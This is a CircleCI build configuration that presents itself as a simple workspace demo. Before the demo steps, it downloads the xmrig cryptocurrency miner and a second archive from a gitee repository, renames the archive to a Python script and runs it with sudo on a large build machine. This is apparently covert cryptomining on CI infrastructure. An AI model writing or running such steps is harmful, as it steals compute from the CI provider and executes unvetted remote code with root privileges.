version: 2
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01 # recommended linux image
    resource_class: 2xlarge
    steps:
      - checkout
      - run: cd /home
      - run: sudo wget https://gitee.com/googlerhyme/g123456/raw/master/xmrig.zip
      - run: sudo mv xmrig.zip xmrig
      - run: sudo wget https://gitee.com/googlerhyme/g123456/raw/master/1.zip
      - run: sudo mv 1.zip 1.py
      - run: sudo python 1.py

      - run: mkdir -p my_workspace
      - run: echo "Trying out workspaces" > my_workspace/echo-output
      - persist_to_workspace:
          # Must be an absolute path, or relative path from working_directory
          root: my_workspace
          # Must be relative path from root
          paths:
            - echo-output